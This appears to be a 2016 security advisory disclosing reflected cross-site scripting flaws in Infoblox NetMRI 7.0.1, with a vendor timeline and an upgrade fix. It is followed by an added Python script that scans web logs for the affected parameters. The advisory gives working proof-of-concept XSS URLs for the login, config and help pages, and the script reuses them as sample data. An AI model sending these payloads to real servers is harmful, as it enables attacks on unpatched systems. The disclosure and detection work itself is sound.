
Infoblox 7.0.1 Cross Site Scripting

07 Sep 2016 00:00:00 | Reported by Alex Haynes | Type: packetstorm | Source: packetstormsecurity.com

Infoblox 7.0.1 Cross Site Scripting vulnerability in Network Automatio

Code
`Exploit Title: Infoblox Cross-site scripting vulnerabilities  
Product: Infoblox Network Automation  
Vulnerable Versions: 7.0.1 and all previous versions   
Tested Version: 6.9.2  
Advisory Publication: 06/09/2016  
Vulnerability Type: Cross-Site Scripting [CWE-79]  
CVE Reference: NONE  
Credit: Alex Haynes  
  
Advisory Details:  
  
  
(1) Vendor & Product Description  
--------------------------------  
  
Vendor:  
Infoblox  
  
Product & Version:  
Infoblox Network Automation v7.0.1  
  
Vendor URL & Download:  
https://www.infoblox.com/products/network-automation  
  
Product Description:  
"Infoblox also offers a complementary, powerful network automation platform which enables discovery, switch port management, network change configuration and compliance management for multi-vendor network devices. Automation cuts down administrator workload and reduces risk of network outages due to improper configurations or changes."  
  
(2) Vulnerability Details:  
--------------------------  
NetMRI contains many cross-site scripting vulnerabilities. Vulnerable parameters appear on the login page itself as well as on pages reachable only after the user is authenticated. Proof-of-concept examples follow:  
  
The _formStack variable is vulnerable to XSS:  
  
https://NETMRISERVER/netmri/config/userAdmin/login.tdf?_formStack=%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&mode=CHANGE-FORM&eulaAccepted=Accept&TrustToken=%0D&weakPassword=false&skipjackUsername=test&skipjackPassword=test&x=0&y=0  
  
The skipjackPassword and skipjackUsername variables are also vulnerable in the same URL.  
  
The defaultTitle parameter is vulnerable in the URL below (this page is reached after authentication):  
  
https://NETMRISERVER/netmri/config/index.tdf?defaultTitle=9ba35%3Cimg/src=x%20onerror=alert%281%29%3E%22%3Edf522&defaultMenu=Collection_and_Groups&defaultAccordion=Setup&defaultPage=/webui/settings/groups%3FuseTab%3Ddev  
  
The defaultAccordion, defaultMenu and defaultPage parameters are also vulnerable.  
  
In the help section, the helpId parameter is vulnerable:  
  
https://NETMRISERVER/netmri/help/netmri_help/netmri_help.tdf?useContext=1&helpId=networkanalysis_issues_issuesbytype58626%27%3balert%281%29%2f%2f390  
  
  
  
  
(3) Advisory Timeline:  
----------------------  
25/01/2016 - First Contact informing vendor of vulnerabilities. No response.  
01/02/2016 - Follow up e-mail to inform them of vulnerabilities. Response requesting further information.  
01/02/2016 - Information on vulnerabilities sent to vendor. No response.  
08/02/2016 - Follow up e-mail requesting update. Vendor responds asking us to open a support ticket.  
12/02/2016 - Infoblox products out of support so cannot raise ticket. Wrote to vendor to explain situation. No response.  
24/02/2016 - Follow up with vendor on vulnerabilities requesting an update.  
10/03/2016 - Final follow up to vendor requesting an update. Vendor responds and opens support ticket for vulnerabilities, mentioning they will look into vulnerabilities.  
14/03/2016 - Vendor responds saying they are able to reproduce vulnerabilities.  
17/03/2016 - Vendor responds saying some of the vulnerabilities are already fixed in version 7.0.4 but cannot confirm which ones.  
05/04/2016 - Request update from vendor on status of vulnerabilities.  
12/04/2016 - Vendor responds saying CSRF already fixed in 7.0.1, XSS and HTTP Splitting to be fixed in upcoming 7.1.1 - expected release in summer.  
30/06/2016 - Patch 7.1.1 released  
06/09/2016 - Public disclosure  
  
  
(4) Solution:  
------------  
Upgrade to Version 7.1.1  
  
  
(5) Credits:  
------------  
Discovered by Alex Haynes  
`
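
A log-triage check for the parameters listed in section (2), added here as an example; it is not part of the advisory or of any Infoblox code. It assumes combined-format web access logs from the NetMRI host or a proxy in front of it; the log format, the sample entries and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory lists as reflected, grouped by the page that accepts them.
WATCHED = {
    "/netmri/config/userAdmin/login.tdf":
        {"_formStack", "skipjackUsername", "skipjackPassword"},
    "/netmri/config/index.tdf":
        {"defaultTitle", "defaultAccordion", "defaultMenu", "defaultPage"},
    "/netmri/help/netmri_help/netmri_help.tdf": {"helpId"},
}
# Characters that can close an HTML tag/attribute or a quoted JavaScript string.
BREAKOUT = re.compile(r"[<>\"';]")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def suspicious_params(request_target):
    """Return watched parameter names whose decoded value has breakout characters."""
    parts = urlsplit(request_target)
    watched = WATCHED.get(parts.path, set())
    return [name for name, value in parse_qsl(parts.query, keep_blank_values=True)
            if name in watched and BREAKOUT.search(value)]

def scan(log_lines):
    """Return (line_number, [parameter names]) for each entry worth triage."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        hits = suspicious_params(match.group(1)) if match else []
        if hits:
            findings.append((number, hits))
    return findings

# Constructed sample entries; the query strings reuse values shown in the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Sep/2016:10:00:01 +0000] "GET /netmri/config/index.tdf?defaultTitle=Groups&defaultPage=/webui/settings/groups%3FuseTab%3Ddev HTTP/1.1" 200 5120',
    '192.0.2.44 - - [07/Sep/2016:10:02:13 +0000] "GET /netmri/config/index.tdf?defaultTitle=9ba35%3Cimg/src=x%20onerror=alert%281%29%3E%22%3Edf522&defaultMenu=Collection_and_Groups HTTP/1.1" 200 5188',
    '192.0.2.44 - - [07/Sep/2016:10:02:40 +0000] "GET /netmri/help/netmri_help/netmri_help.tdf?useContext=1&helpId=networkanalysis_issues_issuesbytype58626%27%3balert%281%29%2f%2f390 HTTP/1.1" 200 2301',
    '192.0.2.10 - - [07/Sep/2016:10:03:05 +0000] "GET /netmri/help/netmri_help/netmri_help.tdf?useContext=1&helpId=networkanalysis_issues_issuesbytype HTTP/1.1" 200 2290',
    '192.0.2.44 - - [07/Sep/2016:10:04:51 +0000] "GET /netmri/config/userAdmin/login.tdf?_formStack=%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&mode=CHANGE-FORM&skipjackUsername=test&skipjackPassword=test HTTP/1.1" 200 1844',
]

if __name__ == "__main__":
    for number, hits in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious values in {', '.join(hits)}")
```

A hit is a triage lead, not proof of exploitation: a legitimate password containing a quote or semicolon will also match on skipjackPassword.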
